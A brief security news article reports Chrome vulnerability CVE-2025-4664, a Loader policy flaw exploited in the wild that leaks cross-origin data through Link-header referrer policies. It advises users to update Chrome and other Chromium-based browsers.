Chrome Vulnerability Facilitates Cross-Origin Data Leakage Through Loader Referrer Policy

Google has recently issued updates to its Chrome web browser, addressing four security vulnerabilities, including one classified as being actively exploited in the wild. This high-severity vulnerability, designated as CVE-2025-4664, has been assigned a CVSS score of 4.3 and is attributed to insufficient policy enforcement in a component known as Loader.

The specific issue allows remote attackers to leak cross-origin data through a specially crafted HTML page. This was detailed in a report, which explains that inadequate enforcement policies in the Loader component of Google Chrome before version 136.0.7103.113 facilitated this risk.

Security researcher Vsevolod Kokorin identified the flaw and reported it publicly on X (formerly Twitter) on May 5, 2025. In his posts, he noted that an exploit for this vulnerability is known to be in circulation.

Kokorin emphasized that, unlike other web browsers, Chrome resolves the Link header on sub-resource requests. Consequently, a referrer-policy can be set using the Link header, which can potentially expose sensitive query parameters if configured improperly, leading to severe outcomes such as full account takeovers.

It remains uncertain whether this vulnerability has been utilized in malicious attacks beyond the described proof-of-concept. The CVE-2025-4664 vulnerability follows another recent high-risk issue, CVE-2025-2783, which also faced active exploitation.

To mitigate risks associated with these vulnerabilities, it is strongly recommended for users to update their Chrome browsers to versions 136.0.7103.113 or 136.0.7103.114 for Windows and Mac, and version 136.0.7103.113 for Linux. Users of other Chromium-based browsers, such as Microsoft Edge, Brave, Opera, and Vivaldi, should also ensure they implement necessary updates as they become available.